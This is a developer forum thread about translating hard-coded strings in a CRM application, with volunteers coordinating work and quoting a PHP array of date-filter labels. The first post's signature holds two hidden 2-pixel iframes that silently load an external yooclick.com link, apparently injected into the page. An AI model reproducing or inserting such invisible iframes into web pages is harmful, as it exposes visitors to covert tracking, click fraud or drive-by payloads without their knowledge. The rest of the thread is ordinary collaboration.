Translate of Hard Code

I have beginning to "translate" of Hard Code.

Here is a "first" Version for 4.2.3.

I hope someone help me to make it next.
It gives some places, which are too complicated for me. I hope that an experienced developer will support me in this project.

I hope it will be include into Patch 4 (Thanks to mikefedyk, matt and other !)

Regards,
Kleo <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 22 Comments sorted by Votes Date Added
  • i will review this for the 4.2.5 release.

please remind me once 4.2.4 is out.
  • here are translated summing columns for reports.

the files are from 4.2.4rc2. it work with 4.2.2 and 4.2.3, but summing columns are also "hard coded"...

i have this "translated".

does someone have still interest to make the translation of "hard code" further with me?

kleo
  • hi,

if you can tell me what to do and how, i am always interested in assisting or helping out, just let me know.

best regards,

rudi.
  • hi kleo,

don't be discouraged. one thing i have learned is that one person needs to start working on it, and once others see progress being made they will help also. this has happened in what will be the 4.2.4 release and i can only see it getting bigger as each new release goes out.

mike
  • hello mike,
    hello richie,

thanks for yours good words !
    i try it to did next.

i have a question:
    for some "hard code" don´t give relevant strings.
    what is here best solution ?
    create of new strings ? or?

for example see attachment. the standart filters are used by create of customview and by reports. all are "hard coded"...
    $datefilterdisplay = array&#40;&quot;custom&quot;,&quot;previous fy&quot;, &quot;current fy&quot;,&quot;next fy&quot;,&quot;previous fq&quot;,&quot;current fq&quot;,&quot;next fq&quot;,&quot;yesterday&quot;,                                     &quot;today&quot;,&quot;tomorrow&quot;,&quot;last week&quot;,&quot;current week&quot;,&quot;next week&quot;, &quot;last month&quot;,&quot;current month&quot;, &quot;next month&quot;,&quot;last 7 days&quot;,&quot;last 30 days&quot;,&quot;last 60 days&quot;,&quot;last 90 days&quot;,&quot;last 120 days&quot;,                                                     &quot;next 7 days&quot;,&quot;next 30 days&quot;,&quot;next 60 days&quot;,&quot;next 90 days&quot;,&quot;next 120 days&quot;&#41;;

thanks for your answer in advance !
    kleo
  • here is translation of "hard coded" titels by custom view

regards,
    kleo
  • "kleo&quot wrote:
    i have a question:
    for some "hard code" don´t give relevant strings.
    what is here best solution ?
    create of new strings ? or?

hi kleo!

i think, there is right way to create new strings & and add it to *lang files.

and do not forget to include your results in development roadmap:)

please show me places in code where i can help to your task.
  • hi kleo,

here's my two cents on the translations:

best regards,

rudi.
  • hi,

the edit view also containes some errors:

rudi.
  • hi translaters!

i only wanted to say that i extremely appreciate your work. i hope that you are getting rid of all that hard-coded languageparts.

bye
    sw